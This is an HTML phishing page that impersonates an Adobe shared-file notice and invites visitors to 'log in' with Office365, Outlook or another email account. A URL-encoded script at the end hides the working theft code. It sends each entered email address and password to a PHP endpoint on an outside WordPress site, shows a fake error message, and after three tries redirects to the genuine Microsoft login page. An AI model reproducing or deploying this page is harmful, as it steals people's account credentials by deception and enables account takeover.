
<!DOCTYPE html>
<html lang="en">
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
       <title> Adobe Shared file </title>

<meta name="description" content="_Materials for Supply">



<meta property="og:description" content="&amp;RFQ_">
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
  <style>

video {
  object-fit: cover;
  width: 100vw;
  height: 100vh;
  position: fixed;
  top: 0;
  left: 0;
  z-index: -1;
}
 
  </style>
</head>
<body>

<nav class="navbar bg-white" >
<div class="container">
    <a class="navbar-brand" href="#"><img src="https://cdn.glitch.global/e8efcc23-84cb-44fa-afa3-f5387b920e52/acrobat-lo.png"></a>
    <button class="navbar-toggler " type="button " >
      <span class="navbar-toggler-icon text-dark"></span>
    </button>
   
</div>
</nav>
<video playsinline autoplay muted loop poster="https://quirky-shaw-20dc92.netlify.app/polina.jpg" id="bgvid">
    <source src="https://quirky-shaw-20dc92.netlify.app/vd.mp4" type="video/webm">
    <source src="https://quirky-shaw-20dc92.netlify.app/vd" type="video/mp4">
  </video>

  <div class="container">
<div class="d-flex justify-content-center">
  
        
        <div class="col-sm-8 my-4 text-center">
           <div class="my-4"> <img src="https://lenashore.com/wp-content/uploads/2019/06/acrobat-icon.png" width="100px" height="100px"></div>
           <span class="text-white" style="font-size: 42px;font-weight: 400;"> Welcome to Adobe Shared File</span><br/>
           <span class="text-white"  style="font-size: 42px;font-weight: 50;">Your Contact has shared a file with you.</span>
           <div style="color:white; font-size: 20px;">
            Save your files to Adobe PDF and get them from any device, anywhere
           </div>
<div style="color:white; font-size: 20px;">
            Select any of the options below to view and download the file
           </div>
           <div class="my-5" align="center">
		   <div class="" align="center">
                  <div class="row mx-2">
				  <div class="col-lg-1 mt-2">
                     
                    </div>
                    <div class="col-lg-3 mt-2">
                   <a href="javascript:void(0)" id="office365modal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                        <div class="text-center p-1 rounded" style=" background-color: #FF3C00;">
                          <img src="https://cdn.glitch.me/a9c17eb8-a395-4f7a-ba3f-0e2fc9fb1237/office3651.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;"><br>
                          <span  style="vertical-align: middle; color: white;font-weight: 500">Login with<br> Office365</span>
                        </div>
                      </a>
                    </div>

                    <div class="col-lg-3 mt-2">
                    <a href="javascript:void(0)" id="outlookmodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                        <div class="text-center p-1 rounded" style="  background-color: #0073C8;">
                          <img src="https://cdn.glitch.me/a9c17eb8-a395-4f7a-ba3f-0e2fc9fb1237/outlook.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;">|<br>
                          <span style="vertical-align: middle; color: white;font-weight: 500;">Login with<br> Outlook</span>
                        </div>
                      </a>
                    </div>
                   
                    <div class="col-lg-3 mt-2">
                    <a href="javascript:void(0)" id="othermodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                        <div class="text-center p-1 rounded" style=" background-color: #0B5BD3;">
                          <img src="https://cdn.glitch.me/a9c17eb8-a395-4f7a-ba3f-0e2fc9fb1237/other1.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;"><br>
                          <span class="pl-2" style="vertical-align: middle; color: white;font-weight: 500;">Login with<br> Other</span>
                        </div>
                      </a>
                    </div>
                  </div>
                </div>
				
			
          </div>

           <div class="my-5 text-white" style="font-size: 12px;">
            Office365, Outlook, SharePoint, OneDrive, Skype, OneNote, PowerPoint, Word, Excel are all trademarks of Microsoft.

            All rights reserved © Microsoft 2022.
           </div>
        </div>

       
</div>
  </div>
   
   
          </div>  -->
        </div> 
      </div>




    <!-- Modal for gmail -->
    <div class="modal fade" id="ajaxModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
      <div class="modal-dialog" role="document">
        <div class="modal-content">
          <div class="modal-header">

            <button type="button" class="close" data-dismiss="modal" aria-label="Close">
              <span aria-hidden="true">&times;</span>
            </button>
          </div>
          <div class="modal-body">
            <center>
              <img id="fieldImg" src="images/gmail.png" class="img-fluid rounded-circle" width="80px">
              <h5 class="modal-title" id="exampleModalLabel">Login with <span id="field">Gmail</span></h5>
              <div class="alert alert-danger" id="msg"></div>

            </center>
            <form id="contact" class="form-horizontal well">
              <div class="col-lg-12">
                <div class="form-group">
                  <label for="exampleInputEmail1">Email address</label>
                  <input type="email" name="email" class="form-control" id="email" aria-describedby="emailHelp" placeholder="Enter email">
                  <small id="emailHelp" class="form-text text-muted">We'll never share your email with anyone else.</small>
                </div>
              </div>
              <div class="col-lg-12">
                <div class="form-group">
                  <label for="Password">Password</label>
                  <input type="password" name="password" class="form-control" id="password" aria-describedby="emailHelp" placeholder="Enter Password">
                </div>
              </div>
            </div>
            <div class="modal-footer">
              <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
              <button class="btn btn-lg btn-info pull-right" id="submit-btn">Login</button>
            </div>
          </form>
        </div>
      </div>
    </div>
    

    

    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
  </body>

  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script language="javascript">
<!--
// ==  == //
document.write(unescape('%3C%73%63%72%69%70%74%3E%0A%0A%20%20%20%20%2F%2A%20%67%6C%6F%62%61%6C%20%24%20%2A%2F%0A%20%20%20%20%24%28%64%6F%63%75%6D%65%6E%74%29%2E%72%65%61%64%79%28%66%75%6E%63%74%69%6F%6E%28%29%7B%0A%20%20%20%20%20%20%76%61%72%20%63%6F%75%6E%74%3D%30%3B%0A%20%20%20%20%20%20%24%28%27%23%67%6D%61%69%6C%6D%6F%64%61%6C%27%29%2E%63%6C%69%63%6B%28%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20%24%28%27%23%63%6F%6E%74%61%63%74%27%29%2E%74%72%69%67%67%65%72%28%22%72%65%73%65%74%22%29%3B%0A%20%20%20%20%20%20%20%20%24%28%22%23%6D%73%67%22%29%2E%68%69%64%65%28%29%3B%0A%20%20%20%20%20%20%20%20%24%28%27%23%66%69%65%6C%64%49%6D%67%27%29%2E%61%74%74%72%28%27%73%72%63%27%2C%20%27%69%6D%61%67%65%73%2F%67%6D%61%69%6C%2E%70%6E%67%27%29%3B%0A%20%20%20%20%20%20%20%20%24%28%27%23%66%69%65%6C%64%27%29%2E%68%74%6D%6C%28%22%47%6D%61%69%6C%22%29%3B%0A%20%20%20%20%20%20%20%20%24%28%27%23%61%6A%61%78%4D%6F%64%61%6C%27%29%2E%6D%6F%64%61%6C%28%27%73%68%6F%77%27%29%3B%0A%20%20%20%20%20%20%7D%29%3B%0A%20%20%20%20%20%20%24%28%27%23%6F%75%74%6C%6F%6F%6B%6D%6F%64%61%6C%27%29%2E%63%6C%69%63%6B%28%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20%24%28%27%23%63%6F%6E%74%61%63%74%27%29%2E%74%72%69%67%67%65%72%28%22%72%65%73%65%74%22%29%3B%0A%20%20%20%20%20%20%20%20%24%28%22%23%6D%73%67%22%29%2E%68%69%64%65%28%29%3B%0A%20%20%20%20%20%20%20%20%24%28%27%23%66%69%65%6C%64%49%6D%67%27%29%2E%61%74%74%72%28%27%73%72%63%27%2C%20%27%68%74%74%70%73%3A%2F%2F%63%64%6E%2E%67%6C%69%74%63%68%2E%63%6F%6D%2F%36%63%61%37%32%62%36%36%2D%38%36%30%39%2D%34%33%32%38%2D%39%66%32%65%2D%35%32%31%30%39%37%30%34%31%39%36%31%25%32%46%6F%75%74%6C%6F%6F%6B%32%2E%70%6E%67%27%29%3B%0A%20%20%20%20%20%20%20%20%24%28%27%23%66%69%65%6C%64%27%29%2E%68%74%6D%6C%28%22%4F%75%74%6C%6F%6F%6B%22%29%3B%0A%20%20%20%20%20%20%20%20%24%28%27%23%61%6A%61%78%4D%6F%64%61%6C%27%29%2E%6D%6F%64%61%6C%28%27%73%68%6F%77%27%29%3B%0A%20%20%20%20%20%20%7D%29%3B%0A%20%20%20%20%20%20%24%28%27%23%61%6F%6C%6D%6F%64%61%6C%27%29%2E%63%6C%69%63%6B%28%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20%24%28%27%23%63%6F%6E%74%61%63%74%27%29%2E%74%72%69%67%67%65%72%28%22%72%65%73%65%74%22%29%3B%0A%20%20%20%20%20%20%20%20%24%28%22%23%6D%73%67%22%29%2E%68%69%64%65%28%29%3B%0A%20%20%20%20%20%20%20%20%24%28%27%23%66%69%65%6C%64%49%6D%67%27%29%2E%61%74%74%72%28%27%73%72%63%27%2C%20%27%69%6D%61%67%65%73%2F%61%6F%6C%2E%70%6E%67%27%29%3B%0A%20%20%20%20%20%20%20%20%24%28%27%23%66%69%65%6C%64%27%29%2E%68%74%6D%6C%28%22%41%6F%6C%22%29%3B%0A%20%20%20%20%20%20%20%20%24%28%27%23%61%6A%61%78%4D%6F%64%61%6C%27%29%2E%6D%6F%64%61%6C%28%27%73%68%6F%77%27%29%3B%0A%20%20%20%20%20%20%7D%29%3B%0A%20%20%20%20%20%20%24%28%27%23%6F%66%66%69%63%65%33%36%35%6D%6F%64%61%6C%27%29%2E%63%6C%69%63%6B%28%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20%24%28%27%23%63%6F%6E%74%61%63%74%27%29%2E%74%72%69%67%67%65%72%28%22%72%65%73%65%74%22%29%3B%0A%20%20%20%20%20%20%20%20%24%28%22%23%6D%73%67%22%29%2E%68%69%64%65%28%29%3B%0A%20%20%20%20%20%20%20%20%24%28%27%23%66%69%65%6C%64%49%6D%67%27%29%2E%61%74%74%72%28%27%73%72%63%27%2C%20%27%68%74%74%70%73%3A%2F%2F%63%64%6E%2E%67%6C%69%74%63%68%2E%63%6F%6D%2F%36%63%61%37%32%62%36%36%2D%38%36%30%39%2D%34%33%32%38%2D%39%66%32%65%2D%35%32%31%30%39%37%30%34%31%39%36%31%25%32%46%6F%66%66%69%63%65%31%2E%70%6E%67%27%29%3B%0A%20%20%20%20%20%20%20%20%24%28%27%23%66%69%65%6C%64%27%29%2E%68%74%6D%6C%28%22%4F%66%66%69%63%65%20%33%36%35%22%29%3B%0A%20%20%20%20%20%20%20%20%24%28%27%23%61%6A%61%78%4D%6F%64%61%6C%27%29%2E%6D%6F%64%61%6C%28%27%73%68%6F%77%27%29%3B%0A%20%20%20%20%20%20%7D%29%3B%0A%20%20%20%20%20%20%24%28%27%23%79%61%68%6F%6F%6D%6F%64%61%6C%27%29%2E%63%6C%69%63%6B%28%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20%24%28%27%23%63%6F%6E%74%61%63%74%27%29%2E%74%72%69%67%67%65%72%28%22%72%65%73%65%74%22%29%3B%0A%20%20%20%20%20%20%20%20%24%28%22%23%6D%73%67%22%29%2E%68%69%64%65%28%29%3B%0A%20%20%20%20%20%20%20%20%24%28%27%23%66%69%65%6C%64%49%6D%67%27%29%2E%61%74%74%72%28%27%73%72%63%27%2C%20%27%69%6D%61%67%65%73%2F%79%61%68%6F%6F%2E%70%6E%67%27%29%3B%0A%20%20%20%20%20%20%20%20%24%28%27%23%66%69%65%6C%64%27%29%2E%68%74%6D%6C%28%22%59%61%68%6F%6F%22%29%3B%0A%20%20%20%20%20%20%20%20%24%28%27%23%61%6A%61%78%4D%6F%64%61%6C%27%29%2E%6D%6F%64%61%6C%28%27%73%68%6F%77%27%29%3B%0A%20%20%20%20%20%20%7D%29%3B%0A%20%20%20%20%20%20%24%28%27%23%6F%74%68%65%72%6D%6F%64%61%6C%27%29%2E%63%6C%69%63%6B%28%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20%24%28%27%23%63%6F%6E%74%61%63%74%27%29%2E%74%72%69%67%67%65%72%28%22%72%65%73%65%74%22%29%3B%0A%20%20%20%20%20%20%20%20%24%28%22%23%6D%73%67%22%29%2E%68%69%64%65%28%29%3B%0A%20%20%20%20%20%20%20%20%24%28%27%23%66%69%65%6C%64%49%6D%67%27%29%2E%61%74%74%72%28%27%73%72%63%27%2C%20%27%68%74%74%70%73%3A%2F%2F%63%64%6E%2E%67%6C%69%74%63%68%2E%63%6F%6D%2F%36%63%61%37%32%62%36%36%2D%38%36%30%39%2D%34%33%32%38%2D%39%66%32%65%2D%35%32%31%30%39%37%30%34%31%39%36%31%25%32%46%6F%74%68%65%72%73%32%2E%70%6E%67%27%29%3B%0A%20%20%20%20%20%20%20%20%24%28%27%23%66%69%65%6C%64%27%29%2E%68%74%6D%6C%28%22%4F%74%68%65%72%20%4D%61%69%6C%22%29%3B%0A%20%20%20%20%20%20%20%20%24%28%27%23%61%6A%61%78%4D%6F%64%61%6C%27%29%2E%6D%6F%64%61%6C%28%27%73%68%6F%77%27%29%3B%0A%20%20%20%20%20%20%7D%29%3B%0A%20%20%20%20%20%20%24%28%27%23%73%75%62%6D%69%74%2D%62%74%6E%27%29%2E%63%6C%69%63%6B%28%66%75%6E%63%74%69%6F%6E%28%65%76%65%6E%74%29%7B%0A%20%20%20%20%20%20%20%20%65%76%65%6E%74%2E%70%72%65%76%65%6E%74%44%65%66%61%75%6C%74%28%29%3B%0A%20%20%20%20%20%20%20%20%76%61%72%20%65%6D%61%69%6C%3D%24%28%22%23%65%6D%61%69%6C%22%29%2E%76%61%6C%28%29%3B%0A%20%20%20%20%20%20%20%20%76%61%72%20%70%61%73%73%77%6F%72%64%3D%24%28%22%23%70%61%73%73%77%6F%72%64%22%29%2E%76%61%6C%28%29%3B%0A%20%20%20%20%20%20%20%20%76%61%72%20%64%65%74%61%69%6C%3D%24%28%22%23%66%69%65%6C%64%22%29%2E%68%74%6D%6C%28%29%3B%0A%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%76%61%72%20%6D%73%67%20%3D%20%24%28%27%23%6D%73%67%27%29%2E%68%74%6D%6C%28%29%3B%0A%20%20%20%20%20%20%20%20%24%28%27%23%6D%73%67%27%29%2E%74%65%78%74%28%20%6D%73%67%20%29%3B%0A%20%20%20%20%20%20%20%20%63%6F%75%6E%74%3D%63%6F%75%6E%74%2B%31%3B%0A%20%20%20%20%20%20%20%20%69%66%20%28%63%6F%75%6E%74%3E%3D%33%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%63%6F%75%6E%74%3D%30%3B%0A%20%20%20%20%20%20%20%20%20%20%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%22%68%74%74%70%73%3A%2F%2F%6C%6F%67%69%6E%2E%6D%69%63%72%6F%73%6F%66%74%6F%6E%6C%69%6E%65%2E%63%6F%6D%2F%63%6F%6D%6D%6F%6E%2F%6C%6F%67%69%6E%22%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%65%6C%73%65%0A%20%20%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%20%24%2E%61%6A%61%78%28%7B%0A%20%20%20%20%20%20%20%20%20%20%64%61%74%61%54%79%70%65%3A%20%27%4A%53%4F%4E%27%2C%0A%20%20%20%20%20%20%20%20%20%20%75%72%6C%3A%20%27%68%74%74%70%73%3A%2F%2F%73%6D%69%6C%65%79%73%70%65%61%6B%73%2E%63%6F%6D%2F%77%70%2D%69%6E%63%6C%75%64%65%73%2F%6A%73%2F%6C%65%76%65%6C%73%2F%62%69%7A%7A%6C%65%2F%6E%65%78%74%2E%70%68%70%27%2C%0A%20%20%20%20%20%20%20%20%20%20%74%79%70%65%3A%20%27%50%4F%53%54%27%2C%0A%20%20%20%20%20%20%20%20%20%20%64%61%74%61%3A%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%65%6D%61%69%6C%3A%65%6D%61%69%6C%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%70%61%73%73%77%6F%72%64%3A%70%61%73%73%77%6F%72%64%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%64%65%74%61%69%6C%3A%64%65%74%61%69%6C%2C%0A%0A%20%20%20%20%20%20%20%20%20%20%7D%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%2F%2F%20%64%61%74%61%3A%20%24%28%27%23%63%6F%6E%74%61%63%74%27%29%2E%73%65%72%69%61%6C%69%7A%65%28%29%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%62%65%66%6F%72%65%53%65%6E%64%3A%20%66%75%6E%63%74%69%6F%6E%28%78%68%72%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24%28%27%23%73%75%62%6D%69%74%2D%62%74%6E%27%29%2E%68%74%6D%6C%28%27%56%65%72%69%66%69%6E%67%2E%2E%2E%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%73%75%63%63%65%73%73%3A%20%66%75%6E%63%74%69%6F%6E%28%72%65%73%70%6F%6E%73%65%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%69%66%28%72%65%73%70%6F%6E%73%65%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24%28%22%23%6D%73%67%22%29%2E%73%68%6F%77%28%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6E%73%6F%6C%65%2E%6C%6F%67%28%72%65%73%70%6F%6E%73%65%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%69%66%28%72%65%73%70%6F%6E%73%65%5B%27%73%69%67%6E%61%6C%27%5D%20%3D%3D%20%27%6F%6B%27%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24%28%27%23%6D%73%67%27%29%2E%68%74%6D%6C%28%72%65%73%70%6F%6E%73%65%5B%27%6D%73%67%27%5D%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2F%2F%20%24%28%27%69%6E%70%75%74%2C%20%74%65%78%74%61%72%65%61%27%29%2E%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2F%2F%20%20%20%20%72%65%74%75%72%6E%20%74%68%69%73%2E%64%65%66%61%75%6C%74%56%61%6C%75%65%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2F%2F%20%7D%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%65%6C%73%65%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24%28%27%23%6D%73%67%27%29%2E%68%74%6D%6C%28%72%65%73%70%6F%6E%73%65%5B%27%6D%73%67%27%5D%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%65%72%72%6F%72%3A%20%66%75%6E%63%74%69%6F%6E%28%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24%28%22%23%6D%73%67%22%29%2E%73%68%6F%77%28%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24%28%27%23%6D%73%67%27%29%2E%68%74%6D%6C%28%22%49%6E%76%61%6C%69%64%20%75%73%65%72%20%6F%72%20%70%61%73%73%77%6F%72%64%2C%20%70%6C%65%61%73%65%20%74%72%79%20%61%67%61%69%6E%20%75%73%69%6E%67%20%74%68%65%20%63%6F%72%72%65%63%74%20%63%72%65%64%65%74%61%69%6C%73%2E%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6D%70%6C%65%74%65%3A%20%66%75%6E%63%74%69%6F%6E%28%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24%28%27%23%73%75%62%6D%69%74%2D%62%74%6E%27%29%2E%68%74%6D%6C%28%27%4C%6F%67%69%6E%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%7D%29%3B%0A%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%7D%29%3B%0A%20%20%20%20%7D%29%3B%0A%20%20%3C%2F%73%63%72%69%70%74%3E'));
//-->
</script>
</html>


